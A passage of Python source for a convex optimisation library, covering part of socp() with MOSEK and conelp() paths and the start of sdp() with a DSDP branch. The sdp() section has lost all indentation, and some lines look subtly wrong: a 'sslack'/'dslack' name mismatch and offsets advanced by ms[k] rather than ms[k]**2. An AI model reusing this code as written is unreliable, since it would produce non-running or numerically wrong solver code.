              G*x + s = h,  A*x = b
              G'*z + A'*y + c = 0
              s >= 0, z >= 0
              s'*z = 0

          where

              G = [ Gl; Gq[0]; ...; Gq[N-1] ]
              h = [ hl; hq[0]; ...; hq[N-1] ]
              s = [ sl; sq[0]; ...; sq[N-1] ]
              z = [ zl; zq[0]; ...; zq[N-1] ].

        - 'primal objective': the primal objective c'*x.
        - 'dual objective': the dual objective -h'*z - b'*y.
        - 'gap': the duality gap s'*z.
        - 'relative gap': the relative gap, defined as s'*z / -c'*x if
          the primal objective is negative, s'*z / -(h'*z + b'*y) if
          the dual objective is positive, and None otherwise.
        - 'primal infeasibility': the residual in the primal
          constraints, defined as the maximum of the residual in the
          inequalities

              || G*x + s + h || / max(1, ||h||)

          and the residual in the equalities

              || A*x - b || / max(1, ||b||).

        - 'dual infeasibility': the residual in the dual constraints,
          defined as

              || G'*z + A'*y + c || / max(1, ||c||).

        - 'primal slack': the smallest primal slack,

              min( min_k sl_k, min_k (sq[k][0] - || sq[k][1:] ||) ).

        - 'dual slack': the smallest dual slack,

              min( min_k zl_k, min_k (zq[k][0] - || zq[k][1:] ||) ).

        - 'residual as primal infeasibility certificate': None.
        - 'residual as dual infeasibility certificate': None.

        If the default solver is used, the primal infeasibility is
        guaranteed to be less than solvers.options['feastol']
        (default 1e-7).  The dual infeasibility is guaranteed to be
        less than solvers.options['feastol'] (default 1e-7).  The gap
        is less than solvers.options['abstol'] (default 1e-7) or the
        relative gap is less than solvers.options['reltol'] (default
        1e-6).  If the MOSEK solver is used, the default MOSEK exit
        criteria apply.

        Status 'primal infeasible'.
        - 'x', 'sl', 'sq': None.
        - 'y', 'zl', 'zq' are an approximate certificate of
          infeasibility

              -h'*z - b'*y = 1,  G'*z + A'*y = 0,  z >= 0.

        - 'primal objective': None.
        - 'dual objective': 1.0.
        - 'gap', 'relative gap': None.
        - 'primal infeasibility' and 'dual infeasibility': None.
        - 'primal slack': None.
        - 'dual slack': the smallest dual slack,

              min( min_k zl_k, min_k (zq[k][0] - || zq[k][1:] ||) ).

        - 'residual as primal infeasibility certificate': the residual
          in the condition of the infeasibility certificate, defined as

              || G'*z + A'*y || / max(1, ||c||).

        - 'residual as dual infeasibility certificate': None.

        If the default solver is used, the residual as primal
        infeasibility certificate is guaranteed to be less than
        solvers.options['feastol'] (default 1e-7).  If the MOSEK solver
        is used, the default MOSEK exit criteria apply.

        Status 'dual infeasible'.
        - 'x', 'sl', 'sq': an approximate proof of dual infeasibility

              c'*x = -1,  G*x + s = 0,  A*x = 0,  s >= 0.

        - 'y', 'zl', 'zq': None.
        - 'primal objective': -1.0.
        - 'dual objective': None.
        - 'gap', 'relative gap': None.
        - 'primal infeasibility' and 'dual infeasibility': None.
        - 'primal slack': the smallest primal slack,

              min( min_k sl_k, min_k (sq[k][0] - || sq[k][1:] ||) ).

        - 'dual slack': None.
        - 'residual as primal infeasibility certificate': None.
        - 'residual as dual infeasibility certificate: the residual in
          the conditions of the infeasibility certificate, defined as
          the maximum of

              || G*x + s || / max(1, ||h||) and
              || A*x || / max(1, ||b||).

        If the default solver is used, the residual as dual
        infeasibility certificate is guaranteed to be less than
        solvers.options['feastol'] (default 1e-7).  If the MOSEK solver
        is used, the default MOSEK exit criteria apply.

        Status 'unknown'.  If the MOSEK solver is used, all the fields
        except the status field are empty.  If the default solver is
        used, the values are as follows.
        - 'x', 'y', 'sl', 'sq', 'zl', 'zq': the last iterates before
          termination.  These satisfy s > 0 and z > 0, but are not
          necessarily feasible.
        - 'primal objective': the primal cost c'*x.
        - 'dual objective': the dual cost -h'*z - b'*y.
        - 'gap': the duality gap s'*z.
        - 'relative gap': the relative gap, defined as s'*z / -c'*x if
          the primal cost is negative, s'*z / -(h'*z + b'*y) if the
          dual cost is positive, and None otherwise.
        - 'primal infeasibility': the residual in the primal
          constraints, defined as the maximum of the residual in the
          inequalities

              || G*x + s + h || / max(1, ||h||)

          and the residual in the equalities

              || A*x - b || / max(1, ||b||).

        - 'dual infeasibility': the residual in the dual constraints,
          defined as

              || G'*z + A'*y + c || / max(1, ||c||).

        - 'primal slack': the smallest primal slack,

              min( min_k sl_k, min_k (sq[k][0] - || sq[k][1:] ||) ).

        - 'dual slack': the smallest dual slack,

              min( min_k zl_k, min_k (zq[k][0] - || zq[k][1:] ||) ).

        - 'residual as primal infeasibility certificate':
          None if h'*z + b'*y >= 0; the residual

              || G'*z + A'*y || / (-(h'*z + b'*y) * max(1, ||c||) )

          otherwise.
        - 'residual as dual infeasibility certificate':
          None if c'*x >= 0; the maximum of the residuals

              || G*x + s || / (-c'*x * max(1, ||h||))

          and

              || A*x || / (-c'*x * max(1, ||b||))

          otherwise.

        Termination with status 'unknown' indicates that the algorithm
        failed to find a solution that satisfies the specified
        tolerances.  In some cases, the returned solution may be fairly
        accurate.  If the primal and dual infeasibilities, the gap, and
        the relative gap are small, then x, y, s, z are close to
        optimal.  If the residual as primal infeasibility certificate
        is small, then

            y / (-h'*z - b'*y),  z / (-h'*z - b'*y)

        provide an approximate certificate of primal infeasibility.
        If the residual as certificate of dual infeasibility is small,
        then

            x / (-c'*x),  s / (-c'*x)

        provide an approximate proof of dual infeasibility.

    Control parameters.

        The control parameters for the different solvers can be
        modified by adding an entry to the dictionary
        cvxopt.solvers.options.  The following parameters control the
        execution of the default solver.

            options['show_progress'] True/False (default: True)
            options['maxiters'] positive integer (default: 100)
            options['refinement'] positive integer (default: 1)
            options['abstol'] scalar (default: 1e-7)
            options['reltol'] scalar (default: 1e-6)
            options['feastol'] scalar (default: 1e-7).

        The MOSEK parameters can be modified by adding an entry
        options['mosek'], containing a dictionary with MOSEK
        parameter/value pairs, as described in the MOSEK documentation.

        Options that are not recognized are replaced by their default
        values.
    """

    # Bind the options dictionary exactly as lp() and sdp() do; without
    # this, 'options' is an unresolved name on the MOSEK path and user
    # options are never forwarded to conelp().
    options = kwargs.get('options', globals()['options'])

    from cvxopt import base, blas
    from cvxopt.base import matrix, spmatrix

    # --- Argument validation -------------------------------------------
    if not isinstance(c, matrix) or c.typecode != 'd' or c.size[1] != 1:
        raise TypeError("'c' must be a dense column matrix")
    n = c.size[0]
    if n < 1: raise ValueError("number of variables must be at least 1")

    if Gl is None: Gl = spmatrix([], [], [], (0,n), tc='d')
    if not isinstance(Gl, (matrix, spmatrix)) or Gl.typecode != 'd' or \
        Gl.size[1] != n:
        raise TypeError("'Gl' must be a dense or sparse 'd' matrix "\
            "with %d columns" %n)
    ml = Gl.size[0]
    if hl is None: hl = matrix(0.0, (0,1))
    if not isinstance(hl, matrix) or hl.typecode != 'd' or \
        hl.size != (ml,1):
        raise TypeError("'hl' must be a dense 'd' matrix of " \
            "size (%d,1)" %ml)

    if Gq is None: Gq = []
    if not isinstance(Gq, list) or [ G for G in Gq if
        not isinstance(G, (matrix, spmatrix)) or G.typecode != 'd' or
        G.size[1] != n ]:
        raise TypeError("'Gq' must be a list of sparse or dense 'd' "\
            "matrices with %d columns" %n)
    mq = [ G.size[0] for G in Gq ]
    a = [ k for k in range(len(mq)) if mq[k] == 0 ]
    if a: raise TypeError("the number of rows of Gq[%d] is zero" %a[0])
    if hq is None: hq = []
    if not isinstance(hq, list) or len(hq) != len(mq) or \
        [ h for h in hq if not isinstance(h, (matrix, spmatrix)) or
        h.typecode != 'd' ]:
        raise TypeError("'hq' must be a list of %d dense or sparse "\
            "'d' matrices" %len(mq))
    a = [ k for k in range(len(mq)) if hq[k].size != (mq[k], 1) ]
    if a:
        k = a[0]
        raise TypeError("'hq[%d]' has size (%d,%d). Expected size "\
            "is (%d,1)." %(k, hq[k].size[0], hq[k].size[1], mq[k]))

    if A is None: A = spmatrix([], [], [], (0,n), 'd')
    if not isinstance(A, (matrix, spmatrix)) or A.typecode != 'd' or \
        A.size[1] != n:
        raise TypeError("'A' must be a dense or sparse 'd' matrix "\
            "with %d columns" %n)
    p = A.size[0]
    if b is None: b = matrix(0.0, (0,1))
    if not isinstance(b, matrix) or b.typecode != 'd' or b.size != (p,1):
        raise TypeError("'b' must be a dense matrix of size (%d,1)" %p)

    dims = {'l': ml, 'q': mq, 's': []}
    N = ml + sum(mq)

    # --- MOSEK path ----------------------------------------------------
    if solver == 'mosek':
        from cvxopt import misc
        try:
            from cvxopt import msk
            import mosek
        except ImportError:
            raise ValueError("invalid option (solver = 'mosek'): "\
                "cvxopt.msk is not installed")
        if p: raise ValueError("socp() with the solver = 'mosek' option "\
            "does not handle problems with equality constraints")

        opts = options.get('mosek', None)
        if opts:
            solsta, x, zl, zq = msk.socp(c, Gl, hl, Gq, hq, options=opts)
        else:
            solsta, x, zl, zq = msk.socp(c, Gl, hl, Gq, hq)

        # Scale factors for the relative residuals.
        resx0 = max(1.0, blas.nrm2(c))
        rh = matrix([ blas.nrm2(hl) ] + [ blas.nrm2(hqk) for hqk in hq ])
        resz0 = max(1.0, blas.nrm2(rh))

        # Use a None default: 'near_optimal' does not exist in newer
        # MOSEK versions, and getattr without a default would raise.
        if solsta in (mosek.solsta.optimal,
            getattr(mosek.solsta, 'near_optimal', None)):
            if solsta is mosek.solsta.optimal: status = 'optimal'
            else: status = 'near optimal'
            y = matrix(0.0, (0,1))
            pcost = blas.dot(c, x)
            dcost = -blas.dot(hl, zl) - \
                sum([ blas.dot(hq[k], zq[k]) for k in range(len(mq)) ])

            # Slacks: sl = hl - Gl*x, sq[k] = hq[k] - Gq[k]*x.
            sl = matrix(hl)
            base.gemv(Gl, x, sl, alpha = -1.0, beta = 1.0)
            sq = [ +hqk for hqk in hq ]
            for k in range(len(Gq)):
                base.gemv(Gq[k], x, sq[k], alpha = -1.0, beta = 1.0)

            gap = blas.dot(sl, zl) + \
                sum([ blas.dot(zq[k], sq[k]) for k in range(len(mq)) ])
            if pcost < 0.0:
                relgap = gap / -pcost
            elif dcost > 0.0:
                relgap = gap / dcost
            else:
                relgap = None

            # rx = c + G'*z (dual residual; A is empty on this path).
            rx = matrix(c)
            base.gemv(Gl, zl, rx, beta = 1.0, trans = 'T')
            for k in range(len(mq)):
                base.gemv(Gq[k], zq[k], rx, beta = 1.0, trans = 'T')
            resx = blas.nrm2(rx) / resx0

            # rz = G*x + s - h (primal residual).
            rz = matrix(0.0, (ml + sum(mq), 1))
            base.gemv(Gl, x, rz)
            blas.axpy(sl, rz)
            blas.axpy(hl, rz, alpha = -1.0)
            ind = ml
            for k in range(len(mq)):
                base.gemv(Gq[k], x, rz, offsety = ind)
                blas.axpy(sq[k], rz, offsety = ind)
                blas.axpy(hq[k], rz, alpha = -1.0, offsety = ind)
                ind += mq[k]
            resz = blas.nrm2(rz) / resz0

            # Stack s and z to measure the distance to the cone boundary.
            s, z = matrix(0.0, (N,1)), matrix(0.0, (N,1))
            blas.copy(sl, s)
            blas.copy(zl, z)
            ind = ml
            for k in range(len(mq)):
                blas.copy(zq[k], z, offsety = ind)
                blas.copy(sq[k], s, offsety = ind)
                ind += mq[k]
            pslack = -misc.max_step(s, dims)
            dslack = -misc.max_step(z, dims)

            pres, dres = resz, resx
            pinfres, dinfres = None, None

        elif solsta is mosek.solsta.dual_infeas_cer:
            # MOSEK certifies infeasibility of its dual, i.e., primal
            # infeasibility of the problem as posed here.
            status = 'primal infeasible'
            y = matrix(0.0, (0,1))
            hz = blas.dot(hl, zl) + sum([ blas.dot(hq[k], zq[k])
                for k in range(len(mq)) ])
            # Normalize the certificate so that -h'*z = 1.
            blas.scal(1.0 / -hz, zl)
            for k in range(len(mq)):
                blas.scal(1.0 / -hz, zq[k])
            x, sl, sq = None, None, None

            # rx = -G'*z; note alpha = -1.0 in BOTH terms, so the Gq
            # contribution is subtracted (matches the lp() analogue).
            rx = matrix(0.0, (n,1))
            base.gemv(Gl, zl, rx, alpha = -1.0, trans = 'T')
            for k in range(len(mq)):
                base.gemv(Gq[k], zq[k], rx, alpha = -1.0, beta = 1.0,
                    trans = 'T')
            pinfres = blas.nrm2(rx) / resx0
            dinfres = None

            z = matrix(0.0, (N,1))
            blas.copy(zl, z)
            ind = ml
            for k in range(len(mq)):
                blas.copy(zq[k], z, offsety = ind)
                ind += mq[k]
            dslack = -misc.max_step(z, dims)
            pslack = None

            pres, dres = None, None
            pcost, dcost = None, 1.0
            gap, relgap = None, None

        elif solsta == mosek.solsta.prim_infeas_cer:
            # MOSEK certifies primal infeasibility of its formulation,
            # i.e., dual infeasibility here.
            status = 'dual infeasible'
            cx = blas.dot(c, x)
            # Normalize the certificate so that c'*x = -1.
            blas.scal(-1.0 / cx, x)

            sl = matrix(0.0, (ml,1))
            base.gemv(Gl, x, sl, alpha = -1.0)
            sq = [ matrix(0.0, (mqk,1)) for mqk in mq ]
            for k in range(len(mq)):
                base.gemv(Gq[k], x, sq[k], alpha = -1.0, beta = 1.0)

            # rz = s + G*x (should be ~0 for a valid certificate).
            rz = matrix([sl] + [ sqk for sqk in sq ])
            base.gemv(Gl, x, rz, beta = 1.0)
            ind = ml
            for k in range(len(mq)):
                base.gemv(Gq[k], x, rz, beta = 1.0, offsety = ind)
                ind += mq[k]
            resz = blas.nrm2(rz) / resz0

            s = matrix(0.0, (N,1))
            blas.copy(sl, s)
            ind = ml
            for k in range(len(mq)):
                blas.copy(sq[k], s, offsety = ind)
                ind += mq[k]
            pslack = -misc.max_step(s, dims)
            dslack = None

            pres, dres = None, None
            dinfres, pinfres = resz, None
            z, y = None, None
            pcost, dcost = -1.0, None
            gap, relgap = None, None

        else:
            status = 'unknown'
            sl, sq = None, None
            zl, zq = None, None
            x, y = None, None
            pcost, dcost = None, None
            gap, relgap = None, None
            pres, dres = None, None
            pinfres, dinfres = None, None
            pslack, dslack = None, None

        return {'status': status, 'x': x, 'sl': sl, 'sq': sq, 'y': y,
            'zl': zl, 'zq': zq, 'primal objective': pcost,
            'dual objective': dcost, 'gap': gap, 'relative gap': relgap,
            'primal infeasibility': pres, 'dual infeasibility': dres,
            'residual as primal infeasibility certificate': pinfres,
            'residual as dual infeasibility certificate': dinfres,
            'primal slack': pslack, 'dual slack': dslack}

    # --- Default path: stack the constraints and call conelp() ---------
    h = matrix(0.0, (N,1))
    # Dense G if any of the pieces is dense, otherwise sparse.
    if isinstance(Gl, matrix) or [ Gk for Gk in Gq if
        isinstance(Gk, matrix) ]:
        G = matrix(0.0, (N, n))
    else:
        G = spmatrix([], [], [], (N, n), 'd')
    h[:ml] = hl
    G[:ml,:] = Gl
    ind = ml
    for k in range(len(mq)):
        h[ind : ind + mq[k]] = hq[k]
        G[ind : ind + mq[k], :] = Gq[k]
        ind += mq[k]

    # Pack the optional starting points into conelp() format.
    if primalstart:
        ps = {}
        ps['x'] = primalstart['x']
        ps['s'] = matrix(0.0, (N,1))
        if ml: ps['s'][:ml] = primalstart['sl']
        if mq:
            ind = ml
            for k in range(len(mq)):
                ps['s'][ind : ind + mq[k]] = primalstart['sq'][k][:]
                ind += mq[k]
    else:
        ps = None

    if dualstart:
        ds = {}
        if p: ds['y'] = dualstart['y']
        ds['z'] = matrix(0.0, (N,1))
        if ml: ds['z'][:ml] = dualstart['zl']
        if mq:
            ind = ml
            for k in range(len(mq)):
                ds['z'][ind : ind + mq[k]] = dualstart['zq'][k][:]
                ind += mq[k]
    else:
        ds = None

    sol = conelp(c, G, h, dims, A = A, b = b, primalstart = ps,
        dualstart = ds, kktsolver = kktsolver, options = options)

    # Split the stacked slack vector back into 'sl' / 'sq' components.
    if sol['s'] is None:
        sol['sl'] = None
        sol['sq'] = None
    else:
        sol['sl'] = sol['s'][:ml]
        sol['sq'] = [ matrix(0.0, (m,1)) for m in mq ]
        ind = ml
        for k in range(len(mq)):
            sol['sq'][k][:] = sol['s'][ind : ind + mq[k]]
            ind += mq[k]
    del sol['s']

    # Same for the stacked dual vector 'z' -> 'zl' / 'zq'.
    if sol['z'] is None:
        sol['zl'] = None
        sol['zq'] = None
    else:
        sol['zl'] = sol['z'][:ml]
        sol['zq'] = [ matrix(0.0, (m,1)) for m in mq ]
        ind = ml
        for k in range(len(mq)):
            sol['zq'][k][:] = sol['z'][ind : ind + mq[k]]
            ind += mq[k]
    del sol['z']

    return sol
def sdp(c, Gl = None, hl = None, Gs = None, hs = None, A = None, b = None,
kktsolver = None, solver = None, primalstart = None, dualstart = None, **kwargs):
"""
Solves a pair of primal and dual SDPs
minimize c'*x
subject to Gl*x + sl = hl
mat(Gs[k]*x) + ss[k] = hs[k], k = 0, ..., N-1
A*x = b
sl >= 0, ss[k] >= 0, k = 0, ..., N-1
maximize -hl'*z - sum_k trace(hs[k]*zs[k]) - b'*y
subject to Gl'*zl + sum_k Gs[k]'*vec(zs[k]) + A'*y + c = 0
zl >= 0, zs[k] >= 0, k = 0, ..., N-1.
The inequalities sl >= 0 and zl >= 0 are elementwise vector
inequalities. The inequalities ss[k] >= 0, zs[k] >= 0 are matrix
inequalities, i.e., the symmetric matrices ss[k] and zs[k] must be
positive semidefinite. mat(Gs[k]*x) is the symmetric matrix X with
X[:] = Gs[k]*x. For a symmetric matrix, zs[k], vec(zs[k]) is the
vector zs[k][:].
Input arguments.
Gl is a dense or sparse 'd' matrix of size (ml, n). hl is a
dense 'd' matrix of size (ml, 1). The default values of Gl and hl
are matrices with zero rows.
The argument Gs is a list of N dense or sparse 'd' matrices of
size (m[k]**2, n), k = 0, ..., N-1. The columns of Gs[k]
represent symmetric matrices stored as vectors in column major
order. hs is a list of N dense 'd' matrices of size (m[k], m[k]),
k = 0, ..., N-1. The columns of Gs[k] and the matrices hs[k]
represent symmetric matrices in 'L' storage, i.e., only the lower
triangular elements are accessed. The default values of Gs and
hs are empty lists.
A is a dense or sparse 'd' matrix of size (p,n). b is a dense 'd'
matrix of size (p,1). The default values of A and b are matrices
with zero rows.
solver is None or 'dsdp'. The default solver (None) calls
cvxopt.conelp(). The 'dsdp' solver uses an interface to DSDP5.
The 'dsdp' solver does not accept problems with equality
constraints (A and b must have zero rows, or be absent).
The argument primalstart is a dictionary with keys 'x', 'sl',
'ss', and specifies an optional primal starting point.
primalstart['x'] is a dense 'd' matrix of length n;
primalstart['sl'] is a positive dense 'd' matrix of length ml;
primalstart['ss'] is a list of positive definite matrices of
size (ms[k], ms[k]). Only the lower triangular parts of these
matrices will be accessed.
The argument dualstart is a dictionary with keys 'zl', 'zs', 'y'
and specifies an optional dual starting point.
dualstart['y'] is a dense 'd' matrix of length p;
dualstart['zl'] must be a positive dense 'd' matrix of length ml;
dualstart['zs'] is a list of positive definite matrices of
size (ms[k], ms[k]). Only the lower triangular parts of these
matrices will be accessed.
The arguments primalstart and dualstart are ignored when solver
is 'dsdp'.
Output arguments.
Returns a dictionary with keys 'status', 'x', 'sl', 'ss', 'zl',
'zs', 'y', 'primal objective', 'dual objective', 'gap',
'relative gap', 'primal infeasibility', 'dual infeasibility',
'primal slack', 'dual slack', 'residual as primal infeasibility
certificate', 'residual as dual infeasibility certificate'.
The 'status' field has values 'optimal', 'primal infeasible',
'dual infeasible', or 'unknown'. The values of the other fields
depend on the exit status and the solver used.
Status 'optimal'.
- 'x', 'sl', 'ss', 'y', 'zl', 'zs' are an approximate solution of
the primal and dual optimality conditions
G*x + s = h, A*x = b
G'*z + A'*y + c = 0
s >= 0, z >= 0
s'*z = 0
where
G = [ Gl; Gs[0][:]; ...; Gs[N-1][:] ]
h = [ hl; hs[0][:]; ...; hs[N-1][:] ]
s = [ sl; ss[0][:]; ...; ss[N-1][:] ]
z = [ zl; zs[0][:]; ...; zs[N-1][:] ].
- 'primal objective': the primal objective c'*x.
- 'dual objective': the dual objective -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if
the primal objective is negative, s'*z / -(h'*z + b'*y) if the
dual objective is positive, and None otherwise.
- 'primal infeasibility': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack,
min( min_k sl_k, min_k lambda_min(mat(ss[k])) ).
- 'dual slack': the smallest dual slack,
min( min_k zl_k, min_k lambda_min(mat(zs[k])) ).
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate': None.
If the default solver is used, the primal infeasibility is
guaranteed to be less than solvers.options['feastol']
(default 1e-7). The dual infeasibility is guaranteed to be less
than solvers.options['feastol'] (default 1e-7). The gap is less
than solvers.options['abstol'] (default 1e-7) or the relative gap
is less than solvers.options['reltol'] (default 1e-6).
If the DSDP solver is used, the default DSDP exit criteria
apply.
Status 'primal infeasible'.
- 'x', 'sl', 'ss': None.
- 'y', 'zl', 'zs' are an approximate certificate of infeasibility
-h'*z - b'*y = 1, G'*z + A'*y = 0, z >= 0.
- 'primal objective': None.
- 'dual objective': 1.0.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': None
- 'dual slack': the smallest dual slack,
min( min_k zl_k, min_k lambda_min(mat(zs[k])) ).
- 'residual as primal infeasibility certificate': the residual in
the condition of the infeasibility certificate, defined as
|| G'*z + A'*y || / max(1, ||c||).
- 'residual as dual infeasibility certificate': None.
If the default solver is used, the residual as primal infeasiblity
certificate is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). If the DSDP solver is
used, the default DSDP exit criteria apply.
Status 'dual infeasible'.
- 'x', 'sl', 'ss': an approximate proof of dual infeasibility
c'*x = -1, G*x + s = 0, A*x = 0, s >= 0.
- 'y', 'zl', 'zs': None.
- 'primal objective': -1.0.
- 'dual objective': None.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': the smallest primal slack,
min( min_k sl_k, min_k lambda_min(mat(ss[k])) ).
- 'dual slack': None.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate: the residual in
the conditions of the infeasibility certificate, defined as
the maximum of
|| G*x + s || / max(1, ||h||) and || A*x || / max(1, ||b||).
If the default solver is used, the residual as dual infeasiblity
certificate is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). If the MOSEK solver
is used, the default MOSEK exit criteria apply.
Status 'unknown'. If the DSDP solver is used, all the fields
except the status field are empty. If the default solver
is used, the values are as follows.
- 'x', 'y', 'sl', 'ss', 'zl', 'zs': the last iterates before
termination. These satisfy s > 0 and z > 0, but are not
necessarily feasible.
- 'primal objective': the primal cost c'*x.
- 'dual objective': the dual cost -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if the
primal cost is negative, s'*z / -(h'*z + b'*y) if the dual cost
is positive, and None otherwise.
- 'primal infeasibility ': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack,
min( min_k sl_k, min_k lambda_min(mat(ss[k])) ).
- 'dual slack': the smallest dual slack,
min( min_k zl_k, min_k lambda_min(mat(zs[k])) ).
- 'residual as primal infeasibility certificate':
None if h'*z + b'*y >= 0; the residual
|| G'*z + A'*y || / (-(h'*z + b'*y) * max(1, ||c||) )
otherwise.
- 'residual as dual infeasibility certificate':
None if c'*x >= 0; the maximum of the residuals
|| G*x + s || / (-c'*x * max(1, ||h||))
and
|| A*x || / (-c'*x * max(1, ||b||))
otherwise.
Termination with status 'unknown' indicates that the algorithm
failed to find a solution that satisfies the specified tolerances.
In some cases, the returned solution may be fairly accurate. If
the primal and dual infeasibilities, the gap, and the relative gap
are small, then x, y, s, z are close to optimal. If the residual
as primal infeasibility certificate is small, then
y / (-h'*z - b'*y), z / (-h'*z - b'*y)
provide an approximate certificate of primal infeasibility. If
the residual as certificate of dual infeasibility is small, then
x / (-c'*x), s / (-c'*x)
provide an approximate proof of dual infeasibility.
Control parameters.
The following parameters control the execution of the default
solver.
options['show_progress'] True/False (default: True)
options['maxiters'] positive integer (default: 100)
options['refinement'] positive integer (default: 1)
options['abstol'] scalar (default: 1e-7)
options['reltol'] scalar (default: 1e-6)
options['feastol'] scalar (default: 1e-7).
The execution of the 'dsdp' solver is controlled by:
options['DSDP_Monitor'] integer (default: 0)
options['DSDP_MaxIts'] positive integer
options['DSDP_GapTolerance'] scalar (default: 1e-5).
"""
options = kwargs.get('options',globals()['options'])
import math
from cvxopt import base, blas, misc
from cvxopt.base import matrix, spmatrix
if not isinstance(c,matrix) or c.typecode != 'd' or c.size[1] != 1:
raise TypeError("'c' must be a dense column matrix")
n = c.size[0]
if n < 1: raise ValueError("number of variables must be at least 1")
if Gl is None: Gl = spmatrix([], [], [], (0,n), tc='d')
if not isinstance(Gl,(matrix,spmatrix)) or Gl.typecode != 'd' or Gl.size[1] != n:
raise TypeError("'Gl' must be a dense or sparse 'd' matrix "\
"with %d columns" %n)
ml = Gl.size[0]
if hl is None: hl = matrix(0.0, (0,1))
if not isinstance(hl,matrix) or hl.typecode != 'd' or \
hl.size != (ml,1):
raise TypeError("'hl' must be a 'd' matrix of size (%d,1)" %ml)
if Gs is None: Gs = []
if not isinstance(Gs,list) or [ G for G in Gs if not isinstance(G,(matrix,spmatrix)) \
or G.typecode != 'd' or G.size[1] != n ]:
raise TypeError("'Gs' must be a list of sparse or dense 'd' "\
"matrices with %d columns" %n)
ms = [ int(math.sqrt(G.size[0])) for G in Gs ]
a = [ k for k in range(len(ms)) if ms[k]**2 != Gs[k].size[0] ]
if a: raise TypeError("the squareroot of the number of rows in "\
"'Gs[%d]' is not an integer" %k)
if hs is None: hs = []
if not isinstance(hs,list) or len(hs) != len(ms) \
or [ h for h in hs if not isinstance(h,(matrix,spmatrix)) or h.typecode != 'd' ]:
raise TypeError("'hs' must be a list of %d dense or sparse "\
"'d' matrices" %len(ms))
a = [ k for k in range(len(ms)) if hs[k].size != (ms[k],ms[k]) ]
if a:
k = a[0]
raise TypeError("hs[%d] has size (%d,%d). Expected size is "\
"(%d,%d)." %(k,hs[k].size[0], hs[k].size[1], ms[k], ms[k]))
if A is None: A = spmatrix([], [], [], (0,n), 'd')
if not isinstance(A,(matrix,spmatrix)) or A.typecode != 'd' or A.size[1] != n:
raise TypeError("'A' must be a dense or sparse 'd' matrix "\
"with %d columns" %n)
p = A.size[0]
if b is None: b = matrix(0.0, (0,1))
if not isinstance(b,matrix) or b.typecode != 'd' or b.size != (p,1):
raise TypeError("'b' must be a dense matrix of size (%d,1)" %p)
dims = {'l': ml, 'q': [], 's': ms}
N = ml + sum([ m**2 for m in ms ])
if solver == 'dsdp':
try: from cvxopt import dsdp
except ImportError: raise ValueError("invalid option "\
"(solver = 'dsdp'): cvxopt.dsdp is not installed")
if p: raise ValueError("sdp() with the solver = 'dsdp' option "\
"does not handle problems with equality constraints")
opts = options.get('dsdp',None)
if opts:
dsdpstatus, x, r, zl, zs = dsdp.sdp(c, Gl, hl, Gs, hs, options = opts)
else:
dsdpstatus, x, r, zl, zs = dsdp.sdp(c, Gl, hl, Gs, hs)
resx0 = max(1.0, blas.nrm2(c))
rh = matrix([ blas.nrm2(hl) ] + [ math.sqrt(misc.sdot2(hsk, hsk))
for hsk in hs ])
resz0 = max(1.0, blas.nrm2(rh))
if dsdpstatus == 'DSDP_UNBOUNDED':
status = 'dual infeasible'
cx = blas.dot(c,x)
blas.scal(-1.0/cx, x)
sl = -Gl*x
ss = [ -matrix(Gs[k]*x, (ms[k], ms[k])) for k in
range(len(ms)) ]
for k in range(len(ms)):
misc.symm(ss[k], ms[k])
# rz = s + G*x
rz = matrix( [sl] + [ssk[:] for ssk in ss])
base.gemv(Gl, x, rz, beta = 1.0)
ind = ml
for k in range(len(ms)):
base.gemv(Gs[k], x, rz, beta = 1.0, offsety = ind)
ind += ms[k]**2
dims = {'l': ml, 's': ms, 'q': []}
resz = misc.nrm2(rz, dims) / resz0
s = matrix(0.0, (N,1))
blas.copy(sl, s)
ind = ml
for k in range(len(ms)):
blas.copy(ss[k], s, offsety = ind)
ind += ms[k]
pslack = -misc.max_step(s, dims)
sslack = None
pres, dres = None, None
dinfres, pinfres = resz, None
zl, zs, y = None, None, None
pcost, dcost = -1.0, None
gap, relgap = None, None
elif dsdpstatus == 'DSDP_INFEASIBLE':
status = 'primal infeasible'
y = matrix(0.0, (0,1))
hz = blas.dot(hl, zl) + misc.sdot2(hs, zs)
blas.scal(1.0 / -hz, zl)
for k in range(len(ms)):
blas.scal(1.0 / -hz, zs[k])
misc.symm(zs[k], ms[k])
# rx = -G'*z
rx = matrix(0.0, (n,1))
base.gemv(Gl, zl, rx, alpha = -1.0, beta = 1.0, trans = 'T')
ind = 0
for k in range(len(ms)):
blas.scal(0.5, zs[k], inc=ms[k]+1)
for j in range(ms[k]):
blas.scal(0.0, zs[k], offset=j+ms[k]*(j+1), inc=ms[k])
base.gemv(Gs[k], zs[k], rx, alpha=2.0, beta=1.0, trans='T')
blas.scal(2.0, zs[k], inc=ms[k]+1)
ind += ms[k]
pinfres = blas.nrm2(rx) / resx0
dinfres = None
z = matrix(0.0, (N,1))
blas.copy(zl, z)
ind = ml
for k in range(len(ms)):
blas.copy(zs[k], z, offsety = ind)
ind += ms[k]
dslack = -misc.max_step(z, dims)
pslack = None
x, sl, ss = None, None, None
pres, dres = None, None
pcost, dcost = None, 1.0
gap, relgap = None, None
else:
if dsdpstatus == 'DSDP_PDFEASIBLE':
status = 'optimal'
else:
status = 'unknown'
y = matrix(0.0, (0,1))
sl = hl - Gl*x
ss = [ hs[k] - matrix(Gs[k]*x, (ms[k], ms[k])) for k in
range(len(ms)) ]
for k in range(len(ms)):
misc.symm(ss[k], ms[k])
